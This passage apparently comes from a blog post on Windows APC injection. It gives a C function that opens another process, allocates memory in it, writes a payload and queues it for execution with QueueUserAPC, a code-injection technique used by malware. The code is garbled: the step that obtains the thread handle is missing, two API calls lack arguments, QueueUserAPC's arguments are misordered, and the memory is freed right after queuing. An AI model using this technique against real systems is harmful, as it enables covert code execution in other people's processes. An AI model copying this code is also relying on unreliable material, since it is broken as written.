IN  ULONG ApcReserved OPTIONAL);

VOID KiUserApcDispatcher(
IN  PCONTEXT Context,
IN  PVOID ApcContext,
IN  PVOID Argument1,
IN  PVOID Argument2,
IN  PKNORMAL_ROUTINE ApcRoutine)
```

For this post, only QueueUserAPC is used.

```VOID apc_inject(DWORD pid, LPVOID payload, DWORD payloadSize) {
HANDLE hp, ht;
SIZE_T wr;
LPVOID cs;

// 1. Open target process
hp = OpenProcess(
PROCESS_DUP_HANDLE |
PROCESS_VM_WRITE   |
PROCESS_VM_OPERATION,
FALSE, pid);

if(hp == NULL) return;

if(ht != NULL) {
// 3. Allocate memory
cs = VirtualAllocEx(
hp,
NULL,
MEM_COMMIT | MEM_RESERVE,

if(cs != NULL) {
// 4. Write code to memory
if(WriteProcessMemory(
hp,
cs,
&wr))
{
// 5. Run code
QueueUserAPC(cs, ht, 0);
} else {
printf("unable to write payload to process.\n");
}
// 6. Free memory
VirtualFreeEx(
hp,
cs,
0,
MEM_DECOMMIT | MEM_RELEASE);
} else {
printf("unable to allocate memory.\n");
}
} else {